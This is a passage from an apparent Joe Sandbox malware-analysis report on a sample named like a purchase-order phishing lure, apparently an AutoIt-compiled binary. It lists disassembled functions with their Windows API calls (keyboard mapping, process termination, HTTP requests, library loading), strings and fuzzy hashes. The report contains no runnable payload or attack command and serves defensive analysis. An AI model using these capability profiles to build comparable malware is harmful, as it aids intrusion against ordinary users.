                          • Part of subcall function 002D884D: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,002D87EA,002D6AFA,003667D8,00000014), ref: 002D89CF
                          • Part of subcall function 002D884D: _free.LIBCMT ref: 002D89D6
                          • Part of subcall function 002D884D: DeleteCriticalSection.KERNEL32(0036AC68,?,?,002D87EA,002D6AFA,003667D8,00000014), ref: 002D89F8
                        • __calloc_crt.LIBCMT ref: 002D880A
                        • GetCurrentThreadId.KERNEL32 ref: 002D8833
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                        • String ID:
                        • API String ID: 2942034483-0
                        • Opcode ID: a872313bf6eea9151d3252c22cb0dfb3c61ad5efb93445ddd4bf58c107ff68dd
                        • Instruction ID: fc5d44a7ea1d50b687a7c2c9ebf7c4694849fcfef3bda4baa3502141f252c66e
                        • Opcode Fuzzy Hash: a872313bf6eea9151d3252c22cb0dfb3c61ad5efb93445ddd4bf58c107ff68dd
                        • Instruction Fuzzy Hash: 00F0B4335397125AF2657B3C7C07A4A2AD58F01730F604A2BF460D63D2FF508C715951
                        Function 002FA3D2 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                        • String ID:
                        • API String ID: 1423608774-0
                        • Opcode ID: 6f4ceab3ac7412d5ad885f184ff3c28e0883e93fb7d644a0109a81e297b8d81d
                        • Instruction ID: 3668ce5c00a7fa3d671671223868487f3c33ab1123b05fd0e3d635fe5458e791
                        • Opcode Fuzzy Hash: 6f4ceab3ac7412d5ad885f184ff3c28e0883e93fb7d644a0109a81e297b8d81d
                        • Instruction Fuzzy Hash: A001D172501216ABD7162F64FC88EFBF76AFF89342F000579F607D20A0CB60A810CB51
                        Function 002B1867 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 002B1898
                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 002B18A0
                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 002B18AB
                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 002B18B6
                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 002B18BE
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 002B18C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Virtual
                        • String ID:
                        • API String ID: 4278518827-0
                        • Opcode ID: 068b53c5dd4bc72a2ad2f0f729d9e1463383b1ede21f7ebc722c9cb82228111f
                        • Instruction ID: ae0015d2b6fc14dd1b6585287bb2eed650c84ffaddfb1207eea58d700c4c1584
                        • Opcode Fuzzy Hash: 068b53c5dd4bc72a2ad2f0f729d9e1463383b1ede21f7ebc722c9cb82228111f
                        • Instruction Fuzzy Hash: CB0167B0902B5ABDE3008F6A8C85B52FFB8FF19354F04411BA15C47A42C7F5A864CBE5
                        Function 002F84F4 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                        Download Yara Rule
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 002F8504
                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 002F851A
                        • GetWindowThreadProcessId.USER32(?,?), ref: 002F8529
                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002F8538
                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002F8542
                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002F8549
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                        • String ID:
                        • API String ID: 839392675-0
                        • Opcode ID: 51973704e1349a1f8545527a207771962f2b1eae82b29378e9a0de1020ddc3ac
                        • Instruction ID: e22130976064d501bf043c77cf44f10d6113f940a3c0bc9a02d58b4e2a2cacfb
                        • Opcode Fuzzy Hash: 51973704e1349a1f8545527a207771962f2b1eae82b29378e9a0de1020ddc3ac
                        • Instruction Fuzzy Hash: 1FF0BE32600158BBE7221B62AD4EEEF7E7CDFC6B11F000118FA01E1050EBA06A01C6B4
                        Function 002FA31D Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • InterlockedExchange.KERNEL32(?,?), ref: 002FA330
                        • EnterCriticalSection.KERNEL32(?,?,?,?,003266D3,?,?,?,?,?,002BE681), ref: 002FA341
                        • TerminateThread.KERNEL32(?,000001F6,?,?,?,003266D3,?,?,?,?,?,002BE681), ref: 002FA34E
                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,003266D3,?,?,?,?,?,002BE681), ref: 002FA35B
                          • Part of subcall function 002F9CCE: CloseHandle.KERNEL32(?,?,002FA368,?,?,?,003266D3,?,?,?,?,?,002BE681), ref: 002F9CD8
                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 002FA36E
                        • LeaveCriticalSection.KERNEL32(?,?,?,?,003266D3,?,?,?,?,?,002BE681), ref: 002FA375
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                        • String ID:
                        • API String ID: 3495660284-0
                        • Opcode ID: ff46129d613f583a2402e06c1cecd2499e03974b9cc9a0882baa126c7500751e
                        • Instruction ID: 8d14fa26152f3b02b170de1df956e13c9668372b733950b68bdfc02e6c139353
                        • Opcode Fuzzy Hash: ff46129d613f583a2402e06c1cecd2499e03974b9cc9a0882baa126c7500751e
                        • Instruction Fuzzy Hash: 60F05E72545216ABD3122F64FD88EEBBB7EEF89312F000921F602E10A1CBB59851DB51
                        Function 002BC320 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 259fileCOMMON
                        Download Yara Rule
                        APIs
                        • _memmove.LIBCMT ref: 002BC419
                        • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,002F6653,?,?,00000000), ref: 002BC495
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: FileRead_memmove
                        • String ID: Sf/
                        • API String ID: 1325644223-164477059
                        • Opcode ID: e66136e04ef66eceb8d5c18f14448af64fcec6d82f6b73504af54d34aa5ae0d1
                        • Instruction ID: 14bb8cae8a979380c6ab53d05736d5d94312a2c2d36eaf4efa08a4e513637410
                        • Opcode Fuzzy Hash: e66136e04ef66eceb8d5c18f14448af64fcec6d82f6b73504af54d34aa5ae0d1
                        • Instruction Fuzzy Hash: 78A1EF70A14619EBDB01CF65D880BA9FBB4FF05340F24C195E869DB291D771EA60CBA1
                        Function 002CD7C7 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002D010A: std::exception::exception.LIBCMT ref: 002D013E
                          • Part of subcall function 002D010A: __CxxThrowException@8.LIBCMT ref: 002D0153
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                          • Part of subcall function 002BBBD9: _memmove.LIBCMT ref: 002BBC33
                        • __swprintf.LIBCMT ref: 002CD98F
                        Strings
                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 002CD832
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                        • API String ID: 1943609520-557222456
                        • Opcode ID: 88c40ccf285ba9f8bb5e8af51ef4ec2d9c63981e62751ee9860f0483f6aa92b9
                        • Instruction ID: 357830b8cfff4f9c23550280b49f27cec61bc64b1c08551c0736349e6bbc2e08
                        • Opcode Fuzzy Hash: 88c40ccf285ba9f8bb5e8af51ef4ec2d9c63981e62751ee9860f0483f6aa92b9
                        • Instruction Fuzzy Hash: 3F918B31128311AFC715EF24D881DAAB7A8EF85740F014A6EF4869B2A1DB30ED25CF52
                        Function 0030B482 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                        Download Yara Rule
                        APIs
                        • VariantInit.OLEAUT32(?), ref: 0030B4A8
                        • CharUpperBuffW.USER32(?,?), ref: 0030B5B7
                        • VariantClear.OLEAUT32(?), ref: 0030B73A
                          • Part of subcall function 002FA6F6: VariantInit.OLEAUT32(00000000), ref: 002FA736
                          • Part of subcall function 002FA6F6: VariantCopy.OLEAUT32(?,?), ref: 002FA73F
                          • Part of subcall function 002FA6F6: VariantClear.OLEAUT32(?), ref: 002FA74B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                        • API String ID: 4237274167-1221869570
                        • Opcode ID: f2ac376bc0f32fdcfd3f26b4bd3bd05d13390109ed1cd40bb10480087a0b4b96
                        • Instruction ID: def3e2b388f6fb0450ceed48cd5d28b91194b7be7a645a3de5361ddaa1cb8ca9
                        • Opcode Fuzzy Hash: f2ac376bc0f32fdcfd3f26b4bd3bd05d13390109ed1cd40bb10480087a0b4b96
                        • Instruction Fuzzy Hash: C5919D706183059FCB11DF24C890A9ABBF8EF89740F14486DF88A9B391DB31E945CF52
                        Function 002F5D65 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002B3BCF: _wcscpy.LIBCMT ref: 002B3BF2
                        • _memset.LIBCMT ref: 002F5E56
                        • GetMenuItemInfoW.USER32(?), ref: 002F5E85
                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 002F5F31
                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 002F5F5B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                        • String ID: 0
                        • API String ID: 4152858687-4108050209
                        • Opcode ID: a44f5d55e2945a7a638d11747e9a9d0ef4bc3dc7d3dfc20e98095e86899ca1cd
                        • Instruction ID: 963654957847a4c0ebc601b1e10ac9266dfed5840c79760f3e29f7655972d837
                        • Opcode Fuzzy Hash: a44f5d55e2945a7a638d11747e9a9d0ef4bc3dc7d3dfc20e98095e86899ca1cd
                        • Instruction Fuzzy Hash: 6651033253472A9AD3259F28C8846BBF7E8AF46390F080639FB95D31D1D770CD248B92
                        Function 002F1050 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 002F10B8
                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 002F10EE
                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 002F10FF
                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 002F1181
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ErrorMode$AddressCreateInstanceProc
                        • String ID: DllGetClassObject
                        • API String ID: 753597075-1075368562
                        • Opcode ID: 322aa4904cccae327c2ac8e66196f26ce8582b0a52a5925095c80630cb6e559e
                        • Instruction ID: 71d071db012b5300d229a4b142beb6d3ace755a8a476290859afa03d32194858
                        • Opcode Fuzzy Hash: 322aa4904cccae327c2ac8e66196f26ce8582b0a52a5925095c80630cb6e559e
                        • Instruction Fuzzy Hash: 5E415B71610209EFDB05CF54C884AABBBA9EF44390F5480B9EF09DF249D7B1D964CBA0
                        Function 002F5A25 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 002F5A93
                        • GetMenuItemInfoW.USER32 ref: 002F5AAF
                        • DeleteMenu.USER32(00000004,00000007,00000000), ref: 002F5AF5
                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,003718F0,00000000), ref: 002F5B3E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Menu$Delete$InfoItem_memset
                        • String ID: 0
                        • API String ID: 1173514356-4108050209
                        • Opcode ID: 202a3d10f7f85aa3eb107b4c6e8e70735b895ab5808f64ee2a3eef67c3944a03
                        • Instruction ID: 3110e0b636cde32a103eac47affd1a4279c3ca09cd596dafc326a78a2089c1a2
                        • Opcode Fuzzy Hash: 202a3d10f7f85aa3eb107b4c6e8e70735b895ab5808f64ee2a3eef67c3944a03
                        • Instruction Fuzzy Hash: 8E41B2312187169FD711DF24C884F6AF7E8AF85358F04466DFB65972D1D7709820CB62
                        Function 00310458 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                        Download Yara Rule
                        APIs
                        • CharLowerBuffW.USER32(?,?,?,?), ref: 00310478
                          • Part of subcall function 002B7F40: _memmove.LIBCMT ref: 002B7F8F
                          • Part of subcall function 002BA2FB: _memmove.LIBCMT ref: 002BA33D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _memmove$BuffCharLower
                        • String ID: cdecl$none$stdcall$winapi
                        • API String ID: 2411302734-567219261
                        • Opcode ID: 17429aa46038a14f9b7946e316af0d4ade66f33a7d51b8da1e5abab9d9b0f3d0
                        • Instruction ID: a01d7ff2a90f0bbece1744d8488da75b93692245dd6eba632471c4bb4a30ac28
                        • Opcode Fuzzy Hash: 17429aa46038a14f9b7946e316af0d4ade66f33a7d51b8da1e5abab9d9b0f3d0
                        • Instruction Fuzzy Hash: F631F674514619AFCF09DF58C840AEEB3B6FF0A350F108629E4229B2D5DB71E955CF40
                        Function 002EC600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 002EC684
                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 002EC697
                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 002EC6C7
                          • Part of subcall function 002B7E53: _memmove.LIBCMT ref: 002B7EB9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend$_memmove
                        • String ID: ComboBox$ListBox
                        • API String ID: 458670788-1403004172
                        • Opcode ID: f67482ff32c28373eb5d58bae078b8739fbc4e3eb0952571c3bd272ebd6a1240
                        • Instruction ID: ce5103433cef0f516f8ef27cd81a698a0ba8cfef5c93eb777e40c79f7f2c985b
                        • Opcode Fuzzy Hash: f67482ff32c28373eb5d58bae078b8739fbc4e3eb0952571c3bd272ebd6a1240
                        • Instruction Fuzzy Hash: C6212371950144BFDB14AFA5C886DFFBBACDF81350F604119F422E71E0DBB48D2A9A10
                        Function 00304A41 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                        Download Yara Rule
                        APIs
                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00304A60
                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00304A86
                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00304AB6
                        • InternetCloseHandle.WININET(00000000), ref: 00304AFD
                          • Part of subcall function 003056A9: GetLastError.KERNEL32(?,?,00304A2B,00000000,00000000,00000001), ref: 003056BE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                        • String ID:
                        • API String ID: 1951874230-3916222277
                        • Opcode ID: 91fc2fbd672fc7b418381cd0c291e664cfddd8afc5d820b7435644f6c1a3c96e
                        • Instruction ID: 16815c64e5a7e25ec43537724fd13ce7665e0a04c4c0210a7599b0e09c3024e8
                        • Opcode Fuzzy Hash: 91fc2fbd672fc7b418381cd0c291e664cfddd8afc5d820b7435644f6c1a3c96e
                        • Instruction Fuzzy Hash: E421CFB6641208BFEB12DFA59CD5EBBB6ECEB48744F10401AF60596180EA74CE059B70
                        Function 00318EEF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002CC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002CC657
                          • Part of subcall function 002CC619: GetStockObject.GDI32(00000011), ref: 002CC66B
                          • Part of subcall function 002CC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 002CC675
                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00318F69
                        • LoadLibraryW.KERNEL32(?), ref: 00318F70
                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00318F85
                        • DestroyWindow.USER32(?), ref: 00318F8D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                        • String ID: SysAnimate32
                        • API String ID: 4146253029-1011021900
                        • Opcode ID: 7f2244a30408e50d874e6bd23e72ebb47ddf4ab61d7d86019ab0a2b963f444d3
                        • Instruction ID: e14072419a4d6b27aa9a8bdae20f09ffd13fc513319f88078da642729922c73c
                        • Opcode Fuzzy Hash: 7f2244a30408e50d874e6bd23e72ebb47ddf4ab61d7d86019ab0a2b963f444d3
